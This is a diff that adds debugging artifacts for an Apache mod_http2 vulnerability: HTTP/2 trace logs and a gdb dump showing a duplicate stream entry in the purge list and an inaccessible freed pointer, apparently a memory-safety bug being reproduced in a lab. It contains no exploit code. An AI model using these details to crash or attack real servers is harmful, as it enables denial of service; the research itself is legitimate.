+[Thu Aug 06 15:21:23.409803 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(409): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): non-state event 3
+[Thu Aug 06 15:21:23.409805 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): dispatch event 3
+[Thu Aug 06 15:21:23.409807 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(409): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): non-state event 3
+[Thu Aug 06 15:21:23.409808 2026] [http2:trace1] [pid 549:tid 586] h2_mplx.c(758): [client 192.168.65.1:32828] h2_mplx(549-4): stream 1 not found to process
+[Thu Aug 06 15:21:23.409812 2026] [http2:trace1] [pid 549:tid 586] h2_mplx.c(758): [client 192.168.65.1:32828] h2_mplx(549-4): stream 3 not found to process
+[Thu Aug 06 15:21:23.409814 2026] [http2:trace2] [pid 549:tid 586] h2_c1_io.c(131): [client 192.168.65.1:32828] h2_session(9)-out: flush 

--- a/CVE-2026-23918/artifacts/gdb-purge-dump.txt
+++ b/CVE-2026-23918/artifacts/gdb-purge-dump.txt
@@ -1,0 +1,512 @@
+No source file named h2_mplx.c.
+Breakpoint 1 (h2_mplx.c:606) pending.
+warning: Error disabling address space randomization: Operation not permitted
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/aarch64-linux-gnu/libthread_db.so.1".
+AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.4. Set the 'ServerName' directive globally to suppress this message
+warning: Temporarily disabling breakpoints for unloaded shared library "/usr/local/apache2/modules/mod_http2.so"
+[New Thread 0xffff86aca120 (LWP 923)]
+[New Thread 0xffff862ba120 (LWP 924)]
+[New Thread 0xffff85aaa120 (LWP 925)]
+[New Thread 0xffff8529a120 (LWP 926)]
+[New Thread 0xffff84a8a120 (LWP 927)]
+[New Thread 0xffff8427a120 (LWP 928)]
+[New Thread 0xffff83a6a120 (LWP 929)]
+[New Thread 0xffff8325a120 (LWP 930)]
+[New Thread 0xffff82a4a120 (LWP 931)]
+[New Thread 0xffff8223a120 (LWP 932)]
+[New Thread 0xffff81a2a120 (LWP 933)]
+[New Thread 0xffff8121a120 (LWP 934)]
+[New Thread 0xffff80a0a120 (LWP 935)]
+[New Thread 0xffff801fa120 (LWP 936)]
+[New Thread 0xffff7f9ea120 (LWP 937)]
+[New Thread 0xffff7f1da120 (LWP 938)]
+[New Thread 0xffff7e9ca120 (LWP 939)]
+[New Thread 0xffff7e1ba120 (LWP 940)]
+[New Thread 0xffff7d9aa120 (LWP 941)]
+[New Thread 0xffff7d19a120 (LWP 942)]
+[New Thread 0xffff7c98a120 (LWP 943)]
+[New Thread 0xffff7c17a120 (LWP 944)]
+[New Thread 0xffff7b96a120 (LWP 945)]
+[New Thread 0xffff7b15a120 (LWP 946)]
+[New Thread 0xffff7a94a120 (LWP 947)]
+[New Thread 0xffff7a13a120 (LWP 948)]
+[New Thread 0xffff7992a120 (LWP 949)]
+[New Thread 0xffff7911a120 (LWP 950)]
+[New Thread 0xffff7890a120 (LWP 951)]
+[New Thread 0xffff6bfff120 (LWP 952)]
+[New Thread 0xffff6b7ef120 (LWP 953)]
+[New Thread 0xffff6afdf120 (LWP 954)]
+[New Thread 0xffff6a7cf120 (LWP 955)]
+[New Thread 0xffff69fbf120 (LWP 956)]
+[New Thread 0xffff697af120 (LWP 957)]
+[New Thread 0xffff68f9f120 (LWP 958)]
+[New Thread 0xffff47fff120 (LWP 959)]
+[New Thread 0xffff3ffff120 (LWP 960)]
+[New Thread 0xffff477ef120 (LWP 961)]
+[New Thread 0xffff46fdf120 (LWP 962)]
+[New Thread 0xffff467cf120 (LWP 963)]
+[New Thread 0xffff45fbf120 (LWP 964)]
+[New Thread 0xffff457af120 (LWP 965)]
+[New Thread 0xffff44f9f120 (LWP 966)]
+[New Thread 0xffff3f7ef120 (LWP 967)]
+[New Thread 0xffff3efdf120 (LWP 968)]
+[New Thread 0xffff3e7cf120 (LWP 969)]
+[New Thread 0xffff3dfbf120 (LWP 970)]
+[New Thread 0xffff3d7af120 (LWP 971)]
+[New Thread 0xffff3cf9f120 (LWP 972)]
+[New Thread 0xffff07fff120 (LWP 973)]
+[New Thread 0xffff077ef120 (LWP 974)]
+Error while mapping shared library sections:
+/proc/921/ns/mnt: Permission denied.
+[Thread 0xffff7a13a120 (LWP 948) exited]
+[Switching to Thread 0xffff68f9f120 (LWP 958)]
+
+===== PURGE HIT =====
+loop i = 0 of spurge->nelts = 4
+stream = 0xffff875470a0  (same pointer on consecutive hits = duplicate spurge entry)
+$1 = {
+  id = 1,
+  initiated_on = 0,
+  pool = 0xffff87547028,
+  session = 0xffff875760a0,
+  state = H2_SS_CLEANUP,
+  created = 1786031016413732,
+  request = 0xffff87547180,
+  rtmp = 0x0,
+  trailers_in = 0x0,
+  request_headers_added = 0,
+  request_headers_failed = 0,
+  response = 0x0,
+  input = 0x0,
+  in_buffer = 0x0,
+  in_window_size = 65535,
+  in_last_write = 0,
+  output = 0x0,
+  out_buffer = 0x0,
+  rst_error = 5,
+  aborted = 0,
+  scheduled = 0,
+  input_closed = 1,
+  push_policy = 1,
+  sent_trailers = 0,
+  output_eos = 0,
+  c2 = 0x0,
+  pref_priority = 0x0,
+  out_frames = 0,
+  out_frame_octets = 0,
+  out_data_frames = 0,
+  out_data_octets = 0,
+  in_data_frames = 0,
+  in_data_octets = 0,
+  in_trailer_octets = 0,
+  monitor = 0x0
+}
+0xffff875470a0:	0x0000000000000001	0x0000ffff87547028
+0xffff875470b0:	0x0000ffff875760a0	0x0000000000000007
+0xffff875470c0:	0x00065862c04a8a24	0x0000ffff87547180
+0xffff875470d0:	0x0000000000000000	0x0000000000000000
+0xffff875470e0:	0x0000000000000000	0x0000000000000000
+0xffff875470f0:	0x0000000000000000	0x0000000000000000
+
+===== PURGE HIT =====
+loop i = 1 of spurge->nelts = 4
+stream = 0xffff875470a0  (same pointer on consecutive hits = duplicate spurge entry)
+/tmp/capture.gdb:15: Error in sourced command file:
+Cannot access memory at address 0xffff875470a0
+0): created, max_streams=100, stream_mem=32768, workers_limit=6, workers_max=37, push_diary(type=1,N=256), max_data_frame_len=0, max_stream_errors=8
+[Thu Aug 06 15:43:36.409721 2026] [http2:trace1] [pid 921:tid 950] h2_c1.c(300): [client 192.168.65.1:49613] conn_setup
+[Thu Aug 06 15:43:36.409727 2026] [http2:debug] [pid 921:tid 950] h2_session.c(1170): [client 192.168.65.1:49613] AH03201: h2_session(921-0,INIT,0): start, INITIAL_WINDOW_SIZE=65535, MAX_CONCURRENT_STREAMS=100
+[Thu Aug 06 15:43:36.409731 2026] [http2:debug] [pid 921:tid 950] h2_session.c(1876): [client 192.168.65.1:49613] AH03079: h2_session(921-0,INIT,0): started on 172.17.0.4:80
+[Thu Aug 06 15:43:36.409733 2026] [http2:debug] [pid 921:tid 950] h2_session.c(1459): [client 192.168.65.1:49613] AH03078: h2_session(921-0,INIT,0): transit [INIT] -- init --> [BUSY]
+[Thu Aug 06 15:43:36.409736 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(366): [client 192.168.65.1:49613] h2_c1_io(1): adding 15 data bytes
+[Thu Aug 06 15:43:36.409743 2026] [http2:debug] [pid 921:tid 950] h2_session.c(635): [client 192.168.65.1:49613] AH03068: h2_session(921-0,BUSY,0): sent FRAME[SETTINGS[length=6, stream=0]], frames=0/1 (r/s)
+[Thu Aug 06 15:43:36.409746 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(366): [client 192.168.65.1:49613] h2_c1_io(1): adding 13 data bytes
+[Thu Aug 06 15:43:36.409748 2026] [http2:debug] [pid 921:tid 950] h2_session.c(635): [client 192.168.65.1:49613] AH03068: h2_session(921-0,BUSY,0): sent FRAME[WINDOW_UPDATE[stream=0, incr=2147418112]], frames=0/2 (r/s)
+[Thu Aug 06 15:43:36.409750 2026] [http2:trace2] [pid 921:tid 950] h2_session.c(1369): [client 192.168.65.1:49613] nghttp2_session_send: 0
+[Thu Aug 06 15:43:36.409763 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(131): [client 192.168.65.1:49613] h2_session(1)-out: heap[28] 
+[Thu Aug 06 15:43:36.409771 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(131): [client 192.168.65.1:49613] h2_session(1)-out: flush 
+[Thu Aug 06 15:43:36.409804 2026] [http2:trace2] [pid 921:tid 950] h2_mplx.c(1206): [client 192.168.65.1:49613] h2_mplx(921-0): enter polling timeout=0
+[Thu Aug 06 15:43:36.409807 2026] [http2:trace2] [pid 921:tid 950] h2_mplx.c(1250): [client 192.168.65.1:49613] h2_mplx(921-0): polling timed out 
+[Thu Aug 06 15:43:36.409809 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(524): [client 192.168.65.1:49613] h2_session(921-0,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.409816 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(506): [client 192.168.65.1:49613] bb_dump(1): c1 in(HEAP[24] HEAP[26])
+[Thu Aug 06 15:43:36.409821 2026] [http2:debug] [pid 921:tid 950] h2_session.c(383): [client 192.168.65.1:49613] AH03066: h2_session(921-0,BUSY,0): recv FRAME[SETTINGS[length=0, stream=0]], frames=0/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.409824 2026] [http2:trace2] [pid 921:tid 950] h2_session.c(464): [client 192.168.65.1:49613] h2_session(921-0,BUSY,0): SETTINGS, len=0
+[Thu Aug 06 15:43:36.409826 2026] [http2:debug] [pid 921:tid 950] h2_session.c(383): [client 192.168.65.1:49613] AH03066: h2_session(921-0,BUSY,0): recv FRAME[PING[length=8, ack=0, stream=0]], frames=1/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.409828 2026] [http2:trace2] [pid 921:tid 950] h2_session.c(473): [client 192.168.65.1:49613] h2_session(921-0,BUSY,0): on_frame_rcv PING[length=8, ack=0, stream=0]
+[Thu Aug 06 15:43:36.409830 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(556): [client 192.168.65.1:49613] h2_session(921-0,BUSY,0): session_read done
+[Thu Aug 06 15:43:36.409832 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(366): [client 192.168.65.1:49613] h2_c1_io(1): adding 9 data bytes
+[Thu Aug 06 15:43:36.409834 2026] [http2:debug] [pid 921:tid 950] h2_session.c(635): [client 192.168.65.1:49613] AH03068: h2_session(921-0,BUSY,0): sent FRAME[SETTINGS[ack=1, stream=0]], frames=2/3 (r/s)
+[Thu Aug 06 15:43:36.409836 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(366): [client 192.168.65.1:49613] h2_c1_io(1): adding 17 data bytes
+[Thu Aug 06 15:43:36.409838 2026] [http2:debug] [pid 921:tid 950] h2_session.c(635): [client 192.168.65.1:49613] AH03068: h2_session(921-0,BUSY,0): sent FRAME[PING[length=8, ack=1, stream=0]], frames=2/4 (r/s)
+[Thu Aug 06 15:43:36.409843 2026] [http2:trace2] [pid 921:tid 950] h2_session.c(1369): [client 192.168.65.1:49613] nghttp2_session_send: 0
+[Thu Aug 06 15:43:36.409845 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(131): [client 192.168.65.1:49613] h2_session(1)-out: heap[26] 
+[Thu Aug 06 15:43:36.409847 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(131): [client 192.168.65.1:49613] h2_session(1)-out: flush 
+[Thu Aug 06 15:43:36.409862 2026] [http2:trace2] [pid 921:tid 950] h2_mplx.c(1206): [client 192.168.65.1:49613] h2_mplx(921-0): enter polling timeout=0
+[Thu Aug 06 15:43:36.409865 2026] [http2:trace2] [pid 921:tid 950] h2_mplx.c(1250): [client 192.168.65.1:49613] h2_mplx(921-0): polling timed out 
+[Thu Aug 06 15:43:36.409867 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(524): [client 192.168.65.1:49613] h2_session(921-0,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.409869 2026] [http2:debug] [pid 921:tid 950] h2_session.c(1459): [client 192.168.65.1:49613] AH03078: h2_session(921-0,BUSY,0): transit [BUSY] -- input exhausted, no streams --> [IDLE]
+[Thu Aug 06 15:43:36.409871 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:49613] h2_session(921-0,IDLE,0): session_read done
+[Thu Aug 06 15:43:36.409879 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(524): [client 192.168.65.1:49613] h2_session(921-0,IDLE,0): session_read start
+[Thu Aug 06 15:43:36.409881 2026] [http2:trace2] [pid 921:tid 950] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:49613] h2_session(921-0,IDLE,0): session_read done
+[Thu Aug 06 15:43:36.409883 2026] [http2:debug] [pid 921:tid 950] h2_session.c(1971): [client 192.168.65.1:49613] AH10306: h2_session(921-0,IDLE,0): returning to mpm c1 monitoring
+[Thu Aug 06 15:43:36.410198 2026] [http2:trace1] [pid 921:tid 951] h2_c1.c(246): [client 192.168.65.1:49613] h2_h2, process_conn
+[Thu Aug 06 15:43:36.410210 2026] [http2:trace1] [pid 921:tid 951] h2_c1.c(297): [client 192.168.65.1:49613] process_conn
+[Thu Aug 06 15:43:36.410213 2026] [http2:trace2] [pid 921:tid 951] h2_c1_io.c(524): [client 192.168.65.1:49613] h2_session(921-0,IDLE,0): session_read start
+[Thu Aug 06 15:43:36.410224 2026] [http2:trace2] [pid 921:tid 951] h2_c1_io.c(506): [client 192.168.65.1:49613] bb_dump(2): c1 in(HEAP[9])
+[Thu Aug 06 15:43:36.410231 2026] [http2:debug] [pid 921:tid 951] h2_session.c(383): [client 192.168.65.1:49613] AH03066: h2_session(921-0,IDLE,0): recv FRAME[SETTINGS[ack=1, stream=0]], frames=2/4 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.410233 2026] [http2:trace2] [pid 921:tid 951] h2_session.c(464): [client 192.168.65.1:49613] h2_session(921-0,IDLE,0): SETTINGS, len=0
+[Thu Aug 06 15:43:36.410235 2026] [http2:trace2] [pid 921:tid 951] h2_session.c(489): [client 192.168.65.1:49613] h2_session(921-0,IDLE,0): session has 1 idle frames
+[Thu Aug 06 15:43:36.410237 2026] [http2:debug] [pid 921:tid 951] h2_session.c(1459): [client 192.168.65.1:49613] AH03078: h2_session(921-0,IDLE,0): transit [IDLE] -- input read --> [BUSY]
+[Thu Aug 06 15:43:36.410239 2026] [http2:trace1] [pid 921:tid 951] h2_session.c(1474): [client 192.168.65.1:49613] h2_session(921-0,IDLE,0): enter idle
+[Thu Aug 06 15:43:36.410240 2026] [http2:trace2] [pid 921:tid 951] h2_c1_io.c(556): [client 192.168.65.1:49613] h2_session(921-0,BUSY,0): session_read done
+[Thu Aug 06 15:43:36.410242 2026] [http2:trace2] [pid 921:tid 951] h2_mplx.c(1206): [client 192.168.65.1:49613] h2_mplx(921-0): enter polling timeout=0
+[Thu Aug 06 15:43:36.410246 2026] [http2:trace2] [pid 921:tid 951] h2_session.c(1406): [client 192.168.65.1:49613] h2_stream(921-0-0,IDLE): on_input change
+[Thu Aug 06 15:43:36.410249 2026] [http2:trace2] [pid 921:tid 951] h2_c1_io.c(524): [client 192.168.65.1:49613] h2_session(921-0,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.410251 2026] [http2:trace2] [pid 921:tid 951] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:49613] h2_session(921-0,BUSY,0): input gone
+[Thu Aug 06 15:43:36.410259 2026] [http2:debug] [pid 921:tid 951] h2_session.c(1569): [client 192.168.65.1:49613] AH03401: h2_session(921-0,BUSY,0): conn error -> shutdown, remote.emitted=0
+[Thu Aug 06 15:43:36.410263 2026] [http2:trace2] [pid 921:tid 951] h2_c1_io.c(366): [client 192.168.65.1:49613] h2_c1_io(2): adding 17 data bytes
+[Thu Aug 06 15:43:36.410266 2026] [http2:debug] [pid 921:tid 951] h2_session.c(635): [client 192.168.65.1:49613] AH03068: h2_session(921-0,BUSY,0): sent FRAME[GOAWAY[error=0, reason='', last_stream=0]], frames=3/5 (r/s)
+[Thu Aug 06 15:43:36.410273 2026] [http2:trace2] [pid 921:tid 951] h2_c1_io.c(131): [client 192.168.65.1:49613] h2_session(2)-out: heap[17] flush 
+[Thu Aug 06 15:43:36.410303 2026] [http2:debug] [pid 921:tid 951] h2_session.c(848): [client 192.168.65.1:49613] AH03069: h2_session(921-0,BUSY,0): sent GOAWAY, err=0, msg=
+[Thu Aug 06 15:43:36.410307 2026] [http2:debug] [pid 921:tid 951] h2_session.c(1459): [client 192.168.65.1:49613] AH03078: h2_session(921-0,BUSY,0): transit [BUSY] -- local goaway --> [DONE]
+[Thu Aug 06 15:43:36.410309 2026] [http2:trace2] [pid 921:tid 951] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:49613] h2_session(921-0,DONE,0): session_read done
+[Thu Aug 06 15:43:36.410311 2026] [http2:trace2] [pid 921:tid 951] h2_c1_io.c(524): [client 192.168.65.1:49613] h2_session(921-0,DONE,0): session_read start
+[Thu Aug 06 15:43:36.410313 2026] [http2:trace2] [pid 921:tid 951] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:49613] h2_session(921-0,DONE,0): input gone
+[Thu Aug 06 15:43:36.410314 2026] [http2:trace2] [pid 921:tid 951] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:49613] h2_session(921-0,DONE,0): session_read done
+[Thu Aug 06 15:43:36.410317 2026] [http2:debug] [pid 921:tid 951] h2_c1.c(134): (70014)End of file found: [client 192.168.65.1:49613] AH03045: h2_session(921-0,DONE,0): process, closing conn
+[Thu Aug 06 15:43:36.410322 2026] [http2:trace1] [pid 921:tid 951] h2_session.c(2133): [client 192.168.65.1:49613] h2_session(921-0,DONE,0): pre_close
+[Thu Aug 06 15:43:36.410325 2026] [http2:trace1] [pid 921:tid 951] h2_session.c(859): [client 192.168.65.1:49613] h2_session(921-0,DONE,0): pool_cleanup
+[Thu Aug 06 15:43:36.410327 2026] [http2:debug] [pid 921:tid 951] h2_session.c(1459): [client 192.168.65.1:49613] AH03078: h2_session(921-0,DONE,0): transit [DONE] -- pre_close --> [CLEANUP]
+[Thu Aug 06 15:43:36.410329 2026] [http2:trace2] [pid 921:tid 951] h2_mplx.c(502): [client 192.168.65.1:49613] h2_mplx(921-0): start release
+[Thu Aug 06 15:43:36.410330 2026] [http2:trace1] [pid 921:tid 951] h2_mplx.c(518): [client 192.168.65.1:49613] h2_mplx(921-0): release, 0/0/0 streams (total/hold/purge), 0 streams
+[Thu Aug 06 15:43:36.410333 2026] [http2:trace1] [pid 921:tid 951] h2_mplx.c(570): [client 192.168.65.1:49613] h2_mplx(921-0): released
+[Thu Aug 06 15:43:36.410724 2026] [http2:trace1] [pid 921:tid 952] h2_c1.c(246): [client 192.168.65.1:54158] h2_h2, process_conn
+[Thu Aug 06 15:43:36.410744 2026] [http2:trace1] [pid 921:tid 952] h2_c1.c(251): [client 192.168.65.1:54158] h2_h2, process_conn, new connection using protocol 'http/1.1', direct=1, tls acceptable=1
+[Thu Aug 06 15:43:36.410752 2026] [http2:trace1] [pid 921:tid 952] h2_c1.c(281): [client 192.168.65.1:54158] h2_h2, direct mode detected
+[Thu Aug 06 15:43:36.410755 2026] [http2:trace1] [pid 921:tid 952] h2_c1.c(297): [client 192.168.65.1:54158] process_conn
+[Thu Aug 06 15:43:36.410758 2026] [http2:debug] [pid 921:tid 952] h2_stream.c(609): [client 192.168.65.1:54158] AH03082: h2_stream(921-1-0,IDLE): created
+[Thu Aug 06 15:43:36.410805 2026] [http2:debug] [pid 921:tid 952] h2_session.c(1070): [client 192.168.65.1:54158] AH03200: h2_session(921-1,INIT,0): created, max_streams=100, stream_mem=32768, workers_limit=6, workers_max=37, push_diary(type=1,N=256), max_data_frame_len=0, max_stream_errors=8
+[Thu Aug 06 15:43:36.410809 2026] [http2:trace1] [pid 921:tid 952] h2_c1.c(300): [client 192.168.65.1:54158] conn_setup
+[Thu Aug 06 15:43:36.410818 2026] [http2:debug] [pid 921:tid 952] h2_session.c(1170): [client 192.168.65.1:54158] AH03201: h2_session(921-1,INIT,0): start, INITIAL_WINDOW_SIZE=65535, MAX_CONCURRENT_STREAMS=100
+[Thu Aug 06 15:43:36.410822 2026] [http2:debug] [pid 921:tid 952] h2_session.c(1876): [client 192.168.65.1:54158] AH03079: h2_session(921-1,INIT,0): started on 172.17.0.4:80
+[Thu Aug 06 15:43:36.410824 2026] [http2:debug] [pid 921:tid 952] h2_session.c(1459): [client 192.168.65.1:54158] AH03078: h2_session(921-1,INIT,0): transit [INIT] -- init --> [BUSY]
+[Thu Aug 06 15:43:36.410826 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(366): [client 192.168.65.1:54158] h2_c1_io(3): adding 15 data bytes
+[Thu Aug 06 15:43:36.410829 2026] [http2:debug] [pid 921:tid 952] h2_session.c(635): [client 192.168.65.1:54158] AH03068: h2_session(921-1,BUSY,0): sent FRAME[SETTINGS[length=6, stream=0]], frames=0/1 (r/s)
+[Thu Aug 06 15:43:36.410831 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(366): [client 192.168.65.1:54158] h2_c1_io(3): adding 13 data bytes
+[Thu Aug 06 15:43:36.410833 2026] [http2:debug] [pid 921:tid 952] h2_session.c(635): [client 192.168.65.1:54158] AH03068: h2_session(921-1,BUSY,0): sent FRAME[WINDOW_UPDATE[stream=0, incr=2147418112]], frames=0/2 (r/s)
+[Thu Aug 06 15:43:36.410835 2026] [http2:trace2] [pid 921:tid 952] h2_session.c(1369): [client 192.168.65.1:54158] nghttp2_session_send: 0
+[Thu Aug 06 15:43:36.410841 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(131): [client 192.168.65.1:54158] h2_session(3)-out: heap[28] 
+[Thu Aug 06 15:43:36.410846 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(131): [client 192.168.65.1:54158] h2_session(3)-out: flush 
+[Thu Aug 06 15:43:36.410870 2026] [http2:trace2] [pid 921:tid 952] h2_mplx.c(1206): [client 192.168.65.1:54158] h2_mplx(921-1): enter polling timeout=0
+[Thu Aug 06 15:43:36.410874 2026] [http2:trace2] [pid 921:tid 952] h2_mplx.c(1250): [client 192.168.65.1:54158] h2_mplx(921-1): polling timed out 
+[Thu Aug 06 15:43:36.410876 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(524): [client 192.168.65.1:54158] h2_session(921-1,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.410880 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(506): [client 192.168.65.1:54158] bb_dump(3): c1 in(HEAP[24] HEAP[26])
+[Thu Aug 06 15:43:36.410884 2026] [http2:debug] [pid 921:tid 952] h2_session.c(383): [client 192.168.65.1:54158] AH03066: h2_session(921-1,BUSY,0): recv FRAME[SETTINGS[length=0, stream=0]], frames=0/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.410886 2026] [http2:trace2] [pid 921:tid 952] h2_session.c(464): [client 192.168.65.1:54158] h2_session(921-1,BUSY,0): SETTINGS, len=0
+[Thu Aug 06 15:43:36.410888 2026] [http2:debug] [pid 921:tid 952] h2_session.c(383): [client 192.168.65.1:54158] AH03066: h2_session(921-1,BUSY,0): recv FRAME[PING[length=8, ack=0, stream=0]], frames=1/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.410890 2026] [http2:trace2] [pid 921:tid 952] h2_session.c(473): [client 192.168.65.1:54158] h2_session(921-1,BUSY,0): on_frame_rcv PING[length=8, ack=0, stream=0]
+[Thu Aug 06 15:43:36.410892 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(556): [client 192.168.65.1:54158] h2_session(921-1,BUSY,0): session_read done
+[Thu Aug 06 15:43:36.410894 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(366): [client 192.168.65.1:54158] h2_c1_io(3): adding 9 data bytes
+[Thu Aug 06 15:43:36.410896 2026] [http2:debug] [pid 921:tid 952] h2_session.c(635): [client 192.168.65.1:54158] AH03068: h2_session(921-1,BUSY,0): sent FRAME[SETTINGS[ack=1, stream=0]], frames=2/3 (r/s)
+[Thu Aug 06 15:43:36.410898 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(366): [client 192.168.65.1:54158] h2_c1_io(3): adding 17 data bytes
+[Thu Aug 06 15:43:36.410899 2026] [http2:debug] [pid 921:tid 952] h2_session.c(635): [client 192.168.65.1:54158] AH03068: h2_session(921-1,BUSY,0): sent FRAME[PING[length=8, ack=1, stream=0]], frames=2/4 (r/s)
+[Thu Aug 06 15:43:36.410901 2026] [http2:trace2] [pid 921:tid 952] h2_session.c(1369): [client 192.168.65.1:54158] nghttp2_session_send: 0
+[Thu Aug 06 15:43:36.410905 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(131): [client 192.168.65.1:54158] h2_session(3)-out: heap[26] 
+[Thu Aug 06 15:43:36.410908 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(131): [client 192.168.65.1:54158] h2_session(3)-out: flush 
+[Thu Aug 06 15:43:36.410921 2026] [http2:trace2] [pid 921:tid 952] h2_mplx.c(1206): [client 192.168.65.1:54158] h2_mplx(921-1): enter polling timeout=0
+[Thu Aug 06 15:43:36.410924 2026] [http2:trace2] [pid 921:tid 952] h2_mplx.c(1250): [client 192.168.65.1:54158] h2_mplx(921-1): polling timed out 
+[Thu Aug 06 15:43:36.410925 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(524): [client 192.168.65.1:54158] h2_session(921-1,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.410928 2026] [http2:debug] [pid 921:tid 952] h2_session.c(1459): [client 192.168.65.1:54158] AH03078: h2_session(921-1,BUSY,0): transit [BUSY] -- input exhausted, no streams --> [IDLE]
+[Thu Aug 06 15:43:36.410930 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:54158] h2_session(921-1,IDLE,0): session_read done
+[Thu Aug 06 15:43:36.410933 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(524): [client 192.168.65.1:54158] h2_session(921-1,IDLE,0): session_read start
+[Thu Aug 06 15:43:36.410936 2026] [http2:trace2] [pid 921:tid 952] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:54158] h2_session(921-1,IDLE,0): session_read done
+[Thu Aug 06 15:43:36.410940 2026] [http2:debug] [pid 921:tid 952] h2_session.c(1971): [client 192.168.65.1:54158] AH10306: h2_session(921-1,IDLE,0): returning to mpm c1 monitoring
+[Thu Aug 06 15:43:36.411184 2026] [http2:trace1] [pid 921:tid 953] h2_c1.c(246): [client 192.168.65.1:54158] h2_h2, process_conn
+[Thu Aug 06 15:43:36.411193 2026] [http2:trace1] [pid 921:tid 953] h2_c1.c(297): [client 192.168.65.1:54158] process_conn
+[Thu Aug 06 15:43:36.411195 2026] [http2:trace2] [pid 921:tid 953] h2_c1_io.c(524): [client 192.168.65.1:54158] h2_session(921-1,IDLE,0): session_read start
+[Thu Aug 06 15:43:36.411203 2026] [http2:trace2] [pid 921:tid 953] h2_c1_io.c(506): [client 192.168.65.1:54158] bb_dump(4): c1 in(HEAP[9])
+[Thu Aug 06 15:43:36.411208 2026] [http2:debug] [pid 921:tid 953] h2_session.c(383): [client 192.168.65.1:54158] AH03066: h2_session(921-1,IDLE,0): recv FRAME[SETTINGS[ack=1, stream=0]], frames=2/4 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.411210 2026] [http2:trace2] [pid 921:tid 953] h2_session.c(464): [client 192.168.65.1:54158] h2_session(921-1,IDLE,0): SETTINGS, len=0
+[Thu Aug 06 15:43:36.411211 2026] [http2:trace2] [pid 921:tid 953] h2_session.c(489): [client 192.168.65.1:54158] h2_session(921-1,IDLE,0): session has 1 idle frames
+[Thu Aug 06 15:43:36.411213 2026] [http2:debug] [pid 921:tid 953] h2_session.c(1459): [client 192.168.65.1:54158] AH03078: h2_session(921-1,IDLE,0): transit [IDLE] -- input read --> [BUSY]
+[Thu Aug 06 15:43:36.411215 2026] [http2:trace1] [pid 921:tid 953] h2_session.c(1474): [client 192.168.65.1:54158] h2_session(921-1,IDLE,0): enter idle
+[Thu Aug 06 15:43:36.411216 2026] [http2:trace2] [pid 921:tid 953] h2_c1_io.c(556): [client 192.168.65.1:54158] h2_session(921-1,BUSY,0): session_read done
+[Thu Aug 06 15:43:36.411218 2026] [http2:trace2] [pid 921:tid 953] h2_mplx.c(1206): [client 192.168.65.1:54158] h2_mplx(921-1): enter polling timeout=0
+[Thu Aug 06 15:43:36.411221 2026] [http2:trace2] [pid 921:tid 953] h2_session.c(1406): [client 192.168.65.1:54158] h2_stream(921-1-0,IDLE): on_input change
+[Thu Aug 06 15:43:36.411223 2026] [http2:trace2] [pid 921:tid 953] h2_c1_io.c(524): [client 192.168.65.1:54158] h2_session(921-1,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.411225 2026] [http2:trace2] [pid 921:tid 953] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:54158] h2_session(921-1,BUSY,0): input gone
+[Thu Aug 06 15:43:36.411227 2026] [http2:debug] [pid 921:tid 953] h2_session.c(1569): [client 192.168.65.1:54158] AH03401: h2_session(921-1,BUSY,0): conn error -> shutdown, remote.emitted=0
